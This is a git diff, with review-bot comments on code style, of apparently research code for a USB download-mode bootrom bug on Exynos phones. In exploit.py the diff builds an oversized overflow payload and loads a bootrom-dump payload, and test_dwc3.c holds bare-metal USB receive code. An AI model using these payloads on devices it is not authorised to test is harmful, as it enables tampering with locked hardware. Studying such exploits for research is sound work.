diff --git a/dwc3.bin b/dwc3.bin
index e800078..2a61d94 100755
Binary files a/dwc3.bin and b/dwc3.bin differ
diff --git a/dwc3.elf b/dwc3.elf
index 61b2b6f..2bf5e44 100755
Binary files a/dwc3.elf and b/dwc3.elf differ
diff --git a/dwc3.o b/dwc3.o
index aff8e12..a372f27 100644
Binary files a/dwc3.o and b/dwc3.o differ
diff --git a/exploit.py b/exploit.py
index 0275fd9..a81e53d 100644
--- a/exploit.py
+++ b/exploit.py
@@ -82,7 +82,7 @@ class ExynosDevice():
 # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
 transferred = ctypes.c_int()
- bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
+ bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
 bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
 assert res == 0
@@ -91,8 +91,10 @@ class ExynosDevice():
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
 assert res == 0
- payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
+ payload = b"\xaa" * 0x200
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
+ while True:
+ res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
 pass
 def test_bug(self):
@@ -278,6 +280,7 @@ if __name__ == "__main__":
 # wait_for_device()
 exynos = ExynosDevice()
 exynos.test_bug_2()
+ sys.exit(0)
 path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
 # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
 exynos.exploit(open(path, "rb").read())
diff --git a/test_dwc3.c b/test_dwc3.c
index eb14a87..d39f0b2 100644
--- a/test_dwc3.c
+++ b/test_dwc3.c
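Review bot: The `while True:` loop added after the second bulk transfer has no exit condition and overwrites `res` on every iteration without ever checking it, so the method can only end through an exception or an external kill, and the `pass` after the loop is unreachable. If the loop is meant to run until a transfer fails, `if res != 0: break` inside it makes that explicit and keeps the same check style as the `assert res == 0` lines above; if it is meant to run forever, a one-line comment saying so would stop the next reader from treating it as a leftover. The enclosing method starts before this hunk.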
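Review bot: The `sys.exit(0)` inserted directly after `exynos.test_bug_2()` makes the following `path = ...` assignment and the `exynos.exploit(...)` call unreachable, which reads like a debugging shortcut that was committed by accident. If skipping those lines is intended, commenting them out or gating the exit behind a command-line flag would make the intent visible. This line also needs `import sys` at the top of the file; the import block is outside this diff, so I cannot confirm from here that it is present.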
@@ -10,25 +10,16 @@ extern void sleep(int endpoint,uint32_t timeout);
 #define recv_buffer 0x02021800 + 0x2000
 #define data_received 0x02021800 + 0x2004
-// do {
-// /* loops until image has been received */
-// usb_event_handler();
-// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
-// } while (iVar2 == 0);
-
 void recv_data_cb(uint32_t endpoint, uint32_t len){
 void *rbuf;
 void *dest_buf = (void *)recv_buffer;
 volatile void *dref = (void *)data_received;
+ rbuf = get_endpoint_buffer(endpoint);
 for(int i= 0; i < len; i++){
- rbuf = get_endpoint_buffer(2);
 *(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
 }
- // while(1){}
- // asm("mov x0, #0x0");
- // asm("br x0");
- *(uint8_t *)dref = 3;
+ *(uint8_t *)dref = 1; // Mark as ready
 }
 void recv_data(){
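Review bot: The ready flag written at the end of `recv_data_cb` (`*(uint8_t *)dref = 1; // Mark as ready`) is a bare magic number that `recv_data` in the next hunk compares against with its own literal (`== 1`); the old value `3` had the same split, which is exactly how the two sides drift apart. A single `#define DATA_READY 1` next to the existing `data_received` define, used in both places, would tie them together, and the `// Mark as ready` comment can then live on the define. The `#define recv_buffer 0x02021800 + 0x2000` and `data_received` expressions are unparenthesised; wrapping them as `(0x02021800 + 0x2000)` avoids surprises if they are ever used inside a larger expression.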
@@ -38,18 +29,61 @@ void recv_data(){
 volatile void *dref = (void *)data_received;
 *(uint8_t *)dref = 0;
- maybe_usb_setup_read(2, recv_data_cb, 1);
+ maybe_usb_setup_read(2, recv_data_cb, 0x200);
+ void *rbuf = get_endpoint_buffer(2);
+ dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
 while(1){
 usb_event_handler();
- if(*(uint8_t *)dref == 3){
+ if(*(uint8_t *)dref == 1){
 break;
 }
- sleep(1, 10);
 }
 }
+void send_data(uint32_t *address, uint32_t size)
+{
+ // asm("stp x29, x30, [sp,#-48]!");;
+ // asm("mov w3, #0x0");
+ // asm("bfxil w3, w1, #0, #24");
+ // asm("mov w1, #0xc12");
+ // asm("mov x29, sp");
+ // asm("stp x19, x20, [sp,#16]");
+ // asm("mov x5, #0xc834");
+ // asm("mov w20, #0x1");
+ // asm("movk x5, #0x1540, lsl #16");
+ // asm("ldr x2, [x29,#40]");
+ // asm("mov x4, #0xc838");
+ // asm("orr w6, w1, w20");
+ // asm("movk x4, #0x1540, lsl #16");
+ // asm("mov x19, #0xc83c");
+ // asm("movk x19, #0x1540, lsl #16");
+ // asm("stp w3, w1, [x2,#8]");
+ // asm("mov w3, #0x406");
+ // asm("stp w0, wzr, [x2]");
+ // asm("mov w0, w20");
+ // asm("ldr x1, [x29,#40]");
+ // asm("strb w6, [x2,#12]");
+ // asm("mov x2, #0x27c8");
+ // asm("str w1, [x5]");
+ // asm("mov w1, #0x1388");
+ // asm("str wzr, [x4]");
+ // asm("str w3, [x19]");
+ // asm("blr x2");
+ // asm("mov w0, w20");
+ // asm("ldr w1, [x19]");
+ // asm("ldp x19, x20, [sp,#16]");
+ // asm("ldp x29, x30, [sp],#48");
+ // asm("ret");
+}
+
 int main() {
- recv_data();
+ while(1){
+ recv_data();
+ send_data((uint32_t *) recv_buffer, 0x200);
+ }
+ + // recv_data();
 // sleep(1, 5000);
 asm("mov x0, #0x0");
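Review bot: `send_data` is added with an empty body — every line inside it is commented-out assembly — so the new `send_data((uint32_t *) recv_buffer, 0x200)` call in `main`'s loop is a no-op and both parameters are unused, which `-Wunused-parameter` will flag. Until the body is written, a comment at the top of the function such as `// TODO: stub; body not yet ported from the commented-out assembly below` plus `(void)address; (void)size;` would make that visible to anyone reading `main`. The literal `0x200` now appears three times in this hunk (`maybe_usb_setup_read`, `dwc3_ep0_start_trans`, the `send_data` call); one `#define` alongside the existing `recv_buffer` define would keep them in step. `main` continues past the end of the hunk.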